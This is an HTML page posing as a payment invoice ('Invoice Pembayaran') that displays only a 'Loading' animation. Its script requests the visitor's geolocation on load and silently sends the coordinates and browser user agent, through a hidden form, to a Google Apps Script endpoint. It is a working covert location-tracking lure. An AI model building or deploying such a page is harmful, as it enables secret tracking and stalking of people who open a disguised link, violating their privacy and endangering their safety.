<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Invoice Pembayaran</title>
  <style>
     body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
        }
        h1 {
            font-size: 3em;
            font-weight: bold;
            background: linear-gradient(90deg, #ff6f61, #ff9966, #ffcc66, #faff70);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            animation: gradient 3s infinite linear, blink 1s infinite step-end;
        }
    form {
      display: none;
    }
  </style>
</head>
<body>
  <h1>Loading ......</h1>
  <form name="submit-to-google-sheet">
    <input name="email" type="email" placeholder="Email" value="jhon Doe" required>
    <input name="gmaps" type="text" placeholder="Coordinates" required>
    <input name="deviceInfo" type="text" placeholder="Device Info" required>
    <button type="submit">Send</button>
  </form>

  <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbzPiiaF0RorOw1thXwZPc57-hrQNMmX3NPsevGj2KvyrjjFVwKy3pRfSSABl90kZc2b/exec'
    const form = document.forms['submit-to-google-sheet']
    const gmapsInput = form.elements['gmaps']
    const deviceInfoInput = form.elements['deviceInfo']

    function success(position) {
      const latitude = position.coords.latitude
      const longitude = position.coords.longitude
      gmapsInput.value = `${latitude},${longitude}`

      // Get device information
      const userAgent = navigator.userAgent
      deviceInfoInput.value = userAgent

      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => console.log('Success!', response))
        .catch(error => console.error('Error!', error.message))
    }

    function error() {
      console.error('Unable to retrieve your location')
    }

    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(success, error)
    } else {
      console.error('Geolocation is not supported by your browser')
    }
  </script>
</body>
</html>
